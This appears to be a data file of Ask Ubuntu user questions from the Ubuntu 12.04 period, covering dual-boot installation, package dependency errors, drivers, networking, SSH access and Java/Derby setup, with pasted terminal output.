179505	comprehensive guide to install ubuntu 12.10 x64 after windows 7 on uefi and gpt disk	my laptop is currently running windows 7 64-bit on a gpt disk . instead of bios , the laptop also uses uefi . after googling around , i can not find any guide for this problem ( maybe my googling skill is bad ) . however , i just tried to install ubuntu alongside with windows 7 all by myself . after that , i could n't boot to windows . luckily , i was able to fix that . now , i want to find a guide to follow to make sure that there would be no problem . edit 1 : i found a guide here that suggests using boot-repair : - if you want to try grub-efi , it is first necessary to have a gpt disk with an esp ( efi partition= fat32 , > 200mo , start_of_the_disk , boot flag ) , and to setup the bios in efi mode . then you need to install grub-efi ( an easy way for this is to use boot-repair with the `` separate /efi '' option ) . to finish , some old efi-bios need to create an entry that boots the grub*.efi file in the efi partition . http : //ubuntuforums.org/showthread.php ? t=2003442 & page=2 however , i still do n't understand that i must install ubuntu first ( with a partition ? and a swap partition ? ) then use boot-repair or boot-repair first ?
179506	tor not starting at system boot	i just installed a .onion address forwarded to a local ssh server so i could access my files over multiple network types . usually when i install tor it auto starts with my computer . i actually have to go in and kill it from time to time because it causes problems . now that i 've setup my onion address , i 'm having to start tor every time i log in from command line . how do i get tor to start with the system as usual and not just my individual user account ?
179508	kvm bridged network not working	i just installed kvm on my ubuntu server according to this guide : https : //help.ubuntu.com/community/kvm/installation then prepared a bridged network as shown in here : https : //help.ubuntu.com/community/kvm/networking then , i created a virtual machine with virt-manager . i tried several times but the guest fails to connect to the network ! any help ? ifconfig : br0 link encap : ethernet hwaddr d0:27:88 : b0 : e4:38 inet addr:192.168.20.100 bcast:192.168.20.255 mask:255.255.255.0 inet6 addr : fe80 : :d227:88ff : feb0 : e438/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:62 errors:0 dropped:0 overruns:0 frame:0 tx packets:62 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10493 ( 10.4 kb ) tx bytes:8433 ( 8.4 kb ) eth0 link encap : ethernet hwaddr d0:27:88 : b0 : e4:38 up broadcast running multicast mtu:1500 metric:1 rx packets:62 errors:0 dropped:0 overruns:0 frame:0 tx packets:63 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:11361 ( 11.3 kb ) tx bytes:8479 ( 8.4 kb ) interrupt:41 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) virbr0 link encap : ethernet hwaddr 5a:8c:57:95 : af:3b inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) brctl show : bridge name bridge id stp enabled interfaces br0 8000.d02788b0e438 no eth0 virbr0 8000.000000000000 yes brctl showmacs br0 : port no mac addr is local ? ageing timer 1 5c : d9:98:67 : b6:28 no 48.33 1 d0:27:88 : b0 : e4:38 yes 0.00 1 e0:2a:82 : f9:6c:09 no 0.00 ip route : default via 192.168.20.1 dev br0 metric 100 192.168.20.0/24 dev br0 proto kernel scope link src 192.168.20.100 192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 *in the guest * i was unable to copy paste the info from the guest because ca n't ssh to it . it did n't get any ip from dhcp . wo n't work even after setting it up manually .
179511	unmet dependencies with kdelibs5-data	i was trying to install amarok 1.4 on ubuntu 12.04 ( gnome-classic ) , by following this instructions . problem started after giving these two commands dpkg -i kdelibs5-data_4.6.2-0ubuntu4_all.deb dpkg -i kdelibs-data_3.5.10.dfsg.1-5ubuntu2_all.deb now , immediately after these commands , ubuntu updater popped up and gave me an error that the package catalog is broken and needs to be repaired . nothing can be installed or removed till then . it also offered a suggestion to run apt-get install -f. i tried that , but again got the same error.also tried apt-get clean followed by apt-get install -f. again got the following output : jitesh @ jitesh-desktop : ~ $ sudo apt-get clean jitesh @ jitesh-desktop : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : kdelibs5-data the following packages will be upgraded : kdelibs5-data 1 upgraded , 0 newly installed , 0 to remove and 18 not upgraded . 2 not fully installed or removed . need to get 2,832 kb of archives . after this operation , 2,998 kb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/precise-updates/main kdelibs5-data all 4:4.8.4a-0ubuntu0.2 [ 2,832 kb ] fetched 2,832 kb in 32s ( 86.6 kb/s ) dpkg : dependency problems prevent configuration of kdelibs5-data : libplasma3 ( 4:4.8.4a-0ubuntu0.2 ) breaks kdelibs5-data ( < < 4:4.6.80~ ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . kate-data ( 4:4.8.4-0ubuntu0.1 ) breaks kdelibs5-data ( < < 4:4.6.90 ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . katepart ( 4:4.8.4-0ubuntu0.1 ) breaks kdelibs5-data ( < < 4:4.6.90 ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . dpkg : error processing kdelibs5-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kdelibs-data : kdelibs-data depends on kdelibs5-data ; however : package kdelibs5-data is not configured yet . no apport report written because maxreports is reached already dpkg : error processing kdelibs-data ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : kdelibs5-data kdelibs-data w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : sub-process /usr/bin/dpkg returned an error code ( 1 ) as i thought the error was related to configuring kdelibs , i tried to configure using dpkg . but got the following errors : jitesh @ jitesh-desktop : ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of kdelibs5-data : libplasma3 ( 4:4.8.4a-0ubuntu0.2 ) breaks kdelibs5-data ( < < 4:4.6.80~ ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . kate-data ( 4:4.8.4-0ubuntu0.1 ) breaks kdelibs5-data ( < < 4:4.6.90 ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . katepart ( 4:4.8.4-0ubuntu0.1 ) breaks kdelibs5-data ( < < 4:4.6.90 ) and is installed . version of kdelibs5-data to be configured is 4:4.6.2-0ubuntu4 . dpkg : error processing kdelibs5-data ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kdelibs-data : kdelibs-data depends on kdelibs5-data ; however : package kdelibs5-data is not configured yet . dpkg : error processing kdelibs-data ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : kdelibs5-data kdelibs-data jitesh @ jitesh-desktop : ~ $ now i dont have any idea how to proceed . i am unable to install anything from software centre or using terminal now . some basic info : core2duo , dual booting ubuntu 12.04 with win7 . fresh install of ubuntu 12.04 ( not upgrade ) . incidentally , i had first upgraded from 10.04 and had succesfully installed amarok 1.4 following this same method . but due to other issues , i had to format and do a clean install of 12.04 . now when i tried to install amarok 1.4 , i 'm getting these errors . i also have digikam and k3b installed , if that can be of any help . i use digikam a lot , so removing kde is not feasible for me . any help on this issue will be highly appreciated . thanks in advance .
179512	calling center software	i am looking for an app that can do the following in a pc : receive telephone calls and via the computer , tell the caller some information . optionally have a `` for x service , dial 1 ... for y service , dial 2 ... '' shows stats about calls is there a kind of software in ubuntu for this purpose ?
179513	a `` dummies '' guide to dual-booting with windows xp ?	i am learning everything including how to cope with my own pc currently running xp . i have downloaded ubuntu onto a cd and have had a quick try out . i would now like to install ubuntu on a separate partition so i can learn how to work with it before i get rid of windows entirely . should i use the windows installation app , or is there another different/better option ? note : i am a 60 year old housewife and do n't have teenagers in the house to ask for translations from computerese to english . please give easy-to-understand answers ! help for `` dummies '' would be appreciated . i currently have 2 partitions in my hard disk . the secondary empty one has 46 gb free . thank you !
179515	i want to start over but its confusing	okay , i had a desktop completely running on ubuntu 12.04 . no dual boot at all . i wan na re-install it because of some complications . now i know there are many methods out there , but none could work so i decided to start all over . format the hard drive . like its fresh out of the box . after formatting the drive , why does grub ( error message ) still appear when i boot the pc ? it is part of the motherboard ? ! or do i need to do a full format to erase ubuntu from the hard drive completely ? all i wan na do is to start from scratch . can anyone help ? i am not attempting to full format the hard drive in my windows laptop . is this correct ? is ntfs file system the correct one to use ? i just want to get my hard drive like its out of the box . from there , its all good .
179516	gvfs-mount does not work with ftp anymore	since i have upgraded tu ubuntu 12.04 gvfs-mount does not work with ftp anymore . trying to connect with a ftp-server using nautilus or gvfs-mount `` ftp : //user @ server.de/ '' i get the following error message : error mounting location : error resolving '' : no address associated with hostname connecting via ssh or other protocols works well . the problem occurs only with my current user . that means it ca n't be an issue with the ftp-server . so i tried to delete all gvfs config files with : sudo apt-get purge gvfs and after that reinstalled it . but this did not change anything . what else could i do ? please help .
179519	how do i adjust the resolution on an intel gma x3100 ?	i 'm with fresh install of 12.04 , having gma x3100 as a video card . the problem is i own 19 '' monitor with native resolution of 1280x1024 but ca n't force screen resolution on more then 1024x768 ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 4096 x 4096 vga1 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 i been digging up some info for the past 2 days , yet have n't found any solution . even tried using gdm instead of lightdm . any help is appreciated .
179521	ubuntu 12.04 installer and gparted do not detect the existing windows partitions	i just bought a new laptop that comes with windows 7 preinstalled and i want to install ubuntu alongside with it . the system came with 5 partitions : system partition unknown partition ntfs partition ( the one with windows ) ntfs partition ( to be used for data ) a recovery partition i had removed the ntfs data partition and shrinked the windows partition to make room for ubuntu as it will be my main os . the problem is that when i boot with the live cd , the installation program does not detect any of the partitions and tries to use the whole disk ( /dev/sda ) to install ubuntu . when i start the live cd , i can see that gparted does not detect them : but the disk utility can : also , while looking through askubuntu i 've found similar questions asked before that did not solve my issue , but i have run the commands suggested with the following output : ubuntu @ ubuntu : ~ $ sudo fdisk -lu warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 256 heads , 63 sectors/track , 60563 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2902cc6d device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt ubuntu @ ubuntu : ~ $ sudo fixparts /dev/sda fixparts 0.8.4 loading mbr data from /dev/sda this disk appears to be a gpt disk . use gnu parted or gpt fdisk on it ! exiting ! ubuntu @ ubuntu : ~ $ sudo parted -l error : unable to satisfy all constraints on the partition . error : /dev/sr0 : unrecognised disk label does anyone know how can i workaround this ? edit : i have added a couple of screenshots so people can see better what the problem is . also i have run gdisk as requested by john , here is the output : ubuntu @ ubuntu : ~ $ sudo gdisk -l gpt fdisk ( gdisk ) version 0.8.5 problem opening -l for reading ! error is 2 . the specified file does not exist ! ubuntu @ ubuntu : ~ $ sudo gdisk /dev/sda gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . warning ! secondary partition table overlaps the last partition by 33 blocks ! you will need to delete this partition or resize it in another utility . command ( ? for help ) : p disk /dev/sda : 976773168 sectors , 465.8 gib logical sector size : 512 bytes disk identifier ( guid ) : 91b5a850-8718-4d8c-aa48-4da569e5beae partition table holds up to 128 entries first usable sector is 34 , last usable sector is 976773134 partitions will be aligned on 2048-sector boundaries total free space is 716402654 sectors ( 341.6 gib ) number start ( sector ) end ( sector ) size code name 1 2048 411647 200.0 mib ef00 efi system partition 2 411648 673791 128.0 mib 0c01 microsoft reserved part 3 673792 209174527 99.4 gib 0700 basic data partition 4 925575168 976773167 24.4 gib 2700 basic data partition command ( ? for help ) : v warning ! secondary partition table overlaps the last partition by 33 blocks ! you will need to delete this partition or resize it in another utility . identified 1 problems !
179523	`` /usr/bin/python '' missing after installing python 3.0	os version : ubuntu 12.04 lts hey all , i recently started programming in python , so i went to download python 3.0 , and it appears i have ruined all python files on my installation , whenever i try to run anything with python i get this error : chris @ chris-modena-m101 : ~ $ python bash : /usr/bin/python : no such file or directory chris @ chris-modena-m101 : ~ $ i tried to install python 3 again it said it was done , but i still get this error . please can anyone help me ? this is really bugging me as i cant use many defalt ubuntu programs because of this . thanks for reading .
179525	radeon xpress 200m with hardware acceleration on ubuntu 12.04	my notebook is running with the ati radeon xpress 200m , which is n't supported by amd anymore on linux > 2.6.28 ( fglrx 9.3 ) . i would like to enable hardware acceleration .
179526	how do i change system-wide default java runtime without `` sudo '' ?	sorry for my bad english , but i 'm really trying to be better . ok . i 've created a new command/alias ( changejava ) on ubuntu 12.04 , and i need to skip `` sudo password '' only when i write `` $ changejava '' . if i write `` $ changejava '' using terminal , ubuntu show me what can i do . i just need to press 0 , 1 or 2 . but if i press anything , terminal says : '' update-alternatives : to use /usr/lib/jvm/java-6-sun/jre/bin/java to provide /usr/bin/java ( java ) . update-alternatives : error : could not create file '/var/lib/dpkg/alternatives/java.dpkg-tmp ' : denied. `` if i try `` $ sudo changejava '' , i have : `` type jessegaspar password '' , and the magic happens . without `` sudo '' , does not happen . i tried to edit /etc/sudoers with : % sudo all=nopasswd : all ... however all users will have access to the total permission `` sudo '' . : / : / thanks .
179529	is there any equivalent for jupiter for kubuntu ?	i am looking for a software like jupiter for my kubuntu 12.04 to reduce my battery usage . i want to know , is there any equivalent for jupiter for kubuntu ? or how can i run jupiter on kubuntu ? thanks .
179533	linear b writing not displaying in browser	linear b is part of the unicode standard since 2003 . so why does n't it display in my firefox ? the website in question is : http : //en.wikipedia.org/wiki/linear_b ubuntu 12.04 ( 64-bit ) firefox 14.0.1 screenshot of the problem : http : //i.stack.imgur.com/ovyxn.png
179534	how to permanently migrate to 12.04 from windows 7 without losing anything ?	i recently installed 12.04 using wubi to see if i would like it or not . now i 'm loving it and i want to permanently migrate to ubuntu . in the meantime i downloaded all the packages and customized it . since i spent many hours learning and searching for codes and customizing , i do not want to lose any of those . but since i only allocated about 15gb , i definitely need to upgrade . my first instinct was to increase the allocation limit but now i have everything i need and i do not want to run windows at all . i have a lot of data in windows ( 50gb ) . i absolutely do not want to lose my custom settings in ubuntu . using a external drive is also an option but i would rather try not to . what is the easiest way to get rid of windows 7 without losing any of my data in windows and ubuntu ?
179535	laptop fails to wake up after sleep for several hours	i shut the lid on my toshiba and go to sleep . i come back in the morning and it wo n't wake back up . it seems like i can put it to sleep for less than 2 hours . after that , i 'll have to do a hard reboot to do anything . it does n't seem to happen if i have vlc running . any advice ? running 12.04 w/ gnome 3 .
179536	upstart system services manager /etc/init not /etc/init.d	how can i manage new ubuntu system services ? the ones located in /etc/init/ and not in /etc/init.d/ i want to be able to activate/deactivate/list active , etc .
179542	shortcut to move tabs in firefox	i 'm wondering how to move the focused tab around , to right or left , using a keyboard shortcut in 12.04 ? after a google search i found the shortcut ctrl + ( l/r ) arrows , but it seems to work only in windows , not in ubuntu . any ideas ?
179543	the performance governor for cpufreq does n't seem to behave as advertised	the kernel in use : 3.2.0-23-generic on ubuntu 12.04lts for example , i issue the following command : sudo cpufreq-set -c 0 -g performance then i go to /sys/devices/system/cpu/cpu0/cpufreq and type in the following : sudo cat cpuinfo_cur_freq sometimes i get the max frequency ( 3600 mhz ) when i do this and sometimes i get the min frequency ( 1600 mhz ) . if i do : cat scaling_governor the output is performance , showing that the governor is in fact set to performance . then , to make it even more weird , if i do : cpufreq-info i get : analyzing cpu 0 : driver : acpi-cpufreq cpus which run at the same hardware frequency : 0 1 2 3 8 9 10 11 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 10.0 us . hardware limits : 1.60 ghz - 3.60 ghz available frequency steps : 3.60 ghz , 3.60 ghz , 3.47 ghz , 3.33 ghz , 3.20 ghz , 3.07 ghz , 2.93 ghz , 2.80 ghz , 2.67 ghz , 2.53 ghz , 2.40 ghz , 2.27 ghz , 2.13 ghz , 2.00 ghz , 1.87 ghz , 1.73 ghz , 1.60 ghz available cpufreq governors : conservative , ondemand , userspace , powersave , performance current policy : frequency should be within 3.60 ghz and 3.60 ghz . the governor `` performance '' may decide which speed to use within this range . current cpu frequency is 3.60 ghz . ... if you look at the current policy above , you will notice that it is telling me that the cpu should be pegged at 3.60 ghz . yet , cpuinfo_cur_freq seems to tell a different story .
179544	flash does n't work with fogger	i recently installed fogger but it is n't using flash plugin . of course i have flash installed , but i ca n't watch youtube videos without html5 enabled . please someone tell me how or what can i do ? i want fogger to use flash .
179550	why is my system becoming gradually slower and how should i fix it ?	i 've noticed that the more time passes since i installed the system the more unresponsive it gets . booting up takes for ever , login screen loads slow , logging in takes about 3-4 seconds , when first launching dash it takes about 4-5 seconds until it shows up and i do n't even want to mention starting up apps.. another thing i have noticed is that the responsiveness of the system degrades as it 's running . in its current state , booting from an usb stick will actually take less time than booting from the hdd and the live environment is much more responsive . it used to be the opposite . any thoughts ? update : i run ubuntu on a dell inspiron n7010 . this is its configuration : cpu : intel i5 460m cpu @ 2530mhz ddr : 3gb ddr3 @ 1333mhz hdd : 500gb hdd @ 5400rpm video card : amd radeon mobility 5470 @ 1024mb partition scheme : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a0077 device boot start end blocks id system /dev/sda1 * 2048 99999743 49998848 83 linux /dev/sda2 100001790 976771071 438384641 5 extended /dev/sda5 100001792 102000639 999424 82 linux swap / solaris /dev/sda6 102002688 976771071 437384192 83 linux i 've also attached the image generated by bootchart : http : //i.stack.imgur.com/6abgq.png update ( aug 29 ) : i have found a bottle neck and a fix to the sluggish and degrading performance issue . over time , some memory was being put in the swap file and whenever a program needed to use some of that information everything would basically go to hell due to the low hdd speed . to fix this i had set the vm.swappiness value in /etc/sysctl.conf to 5 in order to make it swap only when absolutely necessary . i am still looking for ways to improve the bootup speed tough .
179554	not getting display through vga after bootup	i connect my netbook to my tv through vga , and it shows while at post and boot-loader screen , but once i 'm booted then i get no picture . i checked my cable connection , and even swapped cables to make sure . i use amd control center for display , and it detects my display . it 's just not showing up . i 've never had this problem . is any one else having this issue ?
179555	xkcd browser dependency issues	i have followed exactly the same instructions for installing xkcd-browser but facing the dependency issues sudo add-apt-repository ppa : brianrobles204/xkcd-browser ; sudo apt-get update ; sudo apt-get install xkcd-browser source : http : //www.omgubuntu.co.uk/2012/08/20-must-have-ubuntu-showdown-apps the following packages have unmet dependencies : xkcd-browser : depends : gir1.2-gwibber-gtk-0.2 but it is not going to be installed e : unable to correct problems , you have held broken packages . can anyone help me in resolving this issue because its short of dependency-hell ?
179556	how do i get the media keys on an asus k53br working ?	i 've got myself an asus k53br . and indeed all fn + random button functions work except my multimedia buttons on the arrow keys . is there any chance i can get them to work ?
179567	error while downloading ati/amd additional drivers	i get the following error when i try to install the drivers for ati/amd : what 's up with this ?
179580	hugin crashes on 12.04	hugin ( panorama stitcher ) : any help ? === > hugin /usr/share/hugin/data/plugins/woa.py cat : control points nam : warped overlap analysis fails @ api-max /usr/share/hugin/data/plugins/top_five.py cat : control points nam : keep 5 cps per image pair fails @ api-max /usr/share/hugin/data/plugins/crop_cp.py cat : control points nam : crop control points fails @ api-max /usr/share/hugin/data/plugins/shooting_pattern.py cat : initial distribution nam:6-1-1 shooting pattern fails @ api-max the program 'hugin ' received an x window system error . this probably reflects a bug in the program . the error was 'badrequest ( invalid request code or no such operation ) ' . ( details : serial 1148 error_code 1 request_code 154 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) linux e520 3.2.0-30-generic-pae # 47-ubuntu smp wed aug 15 18:52:06 utc 2012 i686 i686 i386 gnu/linux guettli @ e520 : ~ ubuntu 12.04.1 lts ( gnu/linux 3.2.0-30-generic-pae i686 )
179581	how can i make my mouse auto-click every 5 seconds ?	i want to click on something for hours . how can i make a script or use an application so the mouse will auto-click every 5 seconds or less ?
179582	what is this file : /usr/bin/ [ ?	the name of the file is ' [ ' . when i open it up in vi it looks like it 's a copy of 'test ' . it 's owned by root .
179587	does ubuntu 12.04 lts support ati catalyst hd radeon 3400 ?	i want to know if ubuntu supports ati catalyst hd radeon 3400 series .
179596	getting ubuntu on bootloader after formatting	i 've been running windows xp on a desktop machine ( c : / ) and installed ubuntu 12.04 ( d : / ) and windows bootloader was able to recognize ubuntu when i turn on the computer . months later , i 've formatted drive c : / , removed xp , and then installed windows 7 but sadly , ubuntu is not showing in the boot menu as it used to be presented : windows 7 ubuntu how to get it back on boot list ? note : please note that installing ubuntu was done from inside windows xp with wubi.exe
179597	how to connect to a personal server on residential internet service	ok ! ! ! i 've successfully connected from an external network on both ssh and http . i changed a bunch of settings though before i got it to work , so i 'm going to slowly change some of them back to see where the problem ( s ) really was ( were ) . thanks for all the suggestions ! ! ! this ought to be a pretty simple answer , but i ca n't find it anywhere , and it 's really confusing me . i am new to ubuntu , and am trying to configure a web server . i have gone through tons of tutorials , and run into `` host '' or `` localhost '' very often . for example , to execute ssh user @ localhost , i would replace user with my username , and localhost with my internal ip address ( connecting from the same local network ) . that much , i can do . i just want to make sure that all i have to do is replace host with my external ( isp provided ) ip address to ssh from an outside network ? ? ? the thing is that i have done that , and it has n't worked , so i want to make sure that my syntax is n't the problem . thanks so much for your patience and support . ok. everyone 's saying i need to forward ports . i did forward ports 80 and 22 through my router to my server , but it 's not working . i also contacted my isp , and they said that they did n't know of any isp restrictions on ports . so , yes . i think i set it up , but it 's still not working . also , i completely bypassed my router , and connected my server directly to the modem , which does not have an internal router , and the problem was still there . since somebody upvoted this question , i can now post my pic : )
179604	ca n't remove gnome-shell and gnome-shell-extensions	the problem is that i ca n't remove the gnome-shell and gnome-shell-extensions . when i try to delete with ubuntu software center there is an error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : and when i try to delete with terminal : araqkh @ araqkh-u30jc : ~ $ sudo apt-get purge gnome-shell-extensions [ sudo ] password for araqkh : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . araqkh @ araqkh-u30jc : ~ $ os : ubuntu 12.04 tls how can i solve this problem ?
179611	wallpaper only shows up after booting from usb	after i boot my pc with ubuntu 12.04 from usb drive , it only shows the wallpaper . i 'm able to access the terminal , and the system files through making a folder . i tried doing the unity -- reset but that does n't work . thanks , i 'm also new to ubuntu .
179618	broadcom 4331 card wo n't detect wireless connection	i am using a macbook pro 8 . i am very new to ubuntu . i think i have the firmware needed , i think i have the correct kernel , and i have followed every tutorial on how to fix this that i could find . again i have a broadcom 4331 wireless chip . it does n't detect any wireless connection . i am currently using the usb tethering on my android for internet . can someone walk me through what i should do ?
179621	sharing ext partitions in virtualbox	i 'm new to ubuntu and i 'm on a wubi installation currently with ( obviously ) ntfs system . i got really sick and tired of windows 7 and the new windows 8 is n't something i really look out to and ubuntu is really awesome so far . but ! since i 'm really dependent on photoshop and autocad and i can not really replace them , i need windows . so , my question is : if i format my drives ( do i have to format all of them to ext partitions ? ) will i still have an option to share them with my windows xp on virtualbox ? i will need this to work . no , qcad and gimp is n't enough , unfortunately . i need those expensive programs .
179628	how can i open irc : // links in pidgin from chromium ?	i want to open irc : // links in pidgin from chromium . when i am logged-in to a irc server ( irc.freenode.net ) running purple-url-handler irc : //irc.freenode.net/ # ubuntu in terminal works fine . but when i click the same link in chromium ( which uses xdg-open to open irc : // links ) it does nothing . any idea how to make this happen ? i am using ubuntu 12.04 .
179630	execute a command on local computer from a connected remote ssh host ?	say i have connected to a remote computer via ssh . from a program on this remote computer , i need to execute a command on my local computer ( the connection initiator ) . which raises the question : is it possible to leech onto the existing connection between the two computers to run a command on the local computer ? i have considered running the command ssh user @ host-of-connecting-party < command > on the remote computer to establish a reversed connection . but this is harder to automate and will require user intervention . i was hoping i could fully automate it , or at least detect the user/hostname of the connected user .
179634	noclassdeffounderror : org/apache/derby/tools/ij	derby says to install to opt , so i did : thufir @ dur : ~ $ thufir @ dur : ~ $ ll /opt/db-derby-10.9.1.0-bin/lib/derbytools.jar -rw-r -- r -- 1 root root 174932 may 31 12:19 /opt/db-derby-10.9.1.0-bin/lib/derbytools.jar thufir @ dur : ~ $ thufir @ dur : ~ $ ll /opt/db-derby-10.9.1.0-bin/bin/ij -rwxr-xr-x 1 root root 5876 may 31 12:18 /opt/db-derby-10.9.1.0-bin/bin/ij* thufir @ dur : ~ $ now , do what value do i set for /etc/environment ? thufir @ dur : ~ $ thufir @ dur : ~ $ cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' java_home= '' /usr/lib/jvm/java-6-openjdk-i386/jre/ '' do i call the env variable derby_install ? what value should it have ? i 'm just trying to use ij tool . here 's what i have so far : root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # source /etc/environment root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # echo $ derby_install /opt/db-derby-10.9.1.0-bin/lib/ root @ dur : /opt/db-derby-10.9.1.0-bin/bin # echo $ derby_home /opt/db-derby-10.9.1.0-bin/ root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # . setembeddedcp root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # java org.apache.derby.tools.sysinfo -- -- -- -- -- -- -- -- -- java information -- -- -- -- -- -- -- -- -- java version : 1.6.0_24 java vendor : sun microsystems inc. java home : /usr/lib/jvm/java-6-openjdk-i386/jre java classpath : /opt/db-derby-10.9.1.0-bin//lib/derby.jar : /opt/db-derby-10.9.1.0-bin//lib/derbytools.jar : os name : linux os architecture : i386 os version : 3.2.0-23-generic java user name : root java user home : /root java user dir : /opt/db-derby-10.9.1.0-bin/bin java.specification.name : java platform api specification java.specification.version : 1.6 java.runtime.version : 1.6.0_24-b24 -- -- -- -- - derby information -- -- -- -- [ /opt/db-derby-10.9.1.0-bin/lib/derby.jar ] 10.9.1.0 - ( 1344872 ) [ /opt/db-derby-10.9.1.0-bin/lib/derbytools.jar ] 10.9.1.0 - ( 1344872 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - locale information -- -- -- -- -- -- -- -- - current locale : [ english/united states [ en_us ] ] found support for locale : [ cs ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ de_de ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ es ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ fr ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ hu ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ it ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ ja_jp ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ ko_kr ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ pl ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ pt_br ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ ru ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ zh_cn ] version : 10.9.1.0 - ( 1344872 ) found support for locale : [ zh_tw ] version : 10.9.1.0 - ( 1344872 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- root @ dur : /opt/db-derby-10.9.1.0-bin/bin # ok , well maybe it works : root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # echo $ classpath /opt/db-derby-10.9.1.0-bin//lib/derby.jar : /opt/db-derby-10.9.1.0-bin//lib/derbytools.jar : root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # java org.apache.derby.tools.ij ij version 10.9 ij > quit > ; root @ dur : /opt/db-derby-10.9.1.0-bin/bin # while it does work from the same console : root @ dur : /opt/db-derby-10.9.1.0-bin/bin # root @ dur : /opt/db-derby-10.9.1.0-bin/bin # cd /root/apache-james-3.0-beta4/var/store/derby/ root @ dur : ~/apache-james-3.0-beta4/var/store/derby # root @ dur : ~/apache-james-3.0-beta4/var/store/derby # java org.apache.derby.tools.ijij version 10.9 ij > quit > ; root @ dur : ~/apache-james-3.0-beta4/var/store/derby # i get errors in another console : root @ dur : ~/apache-james-3.0-beta4/var/store/derby # 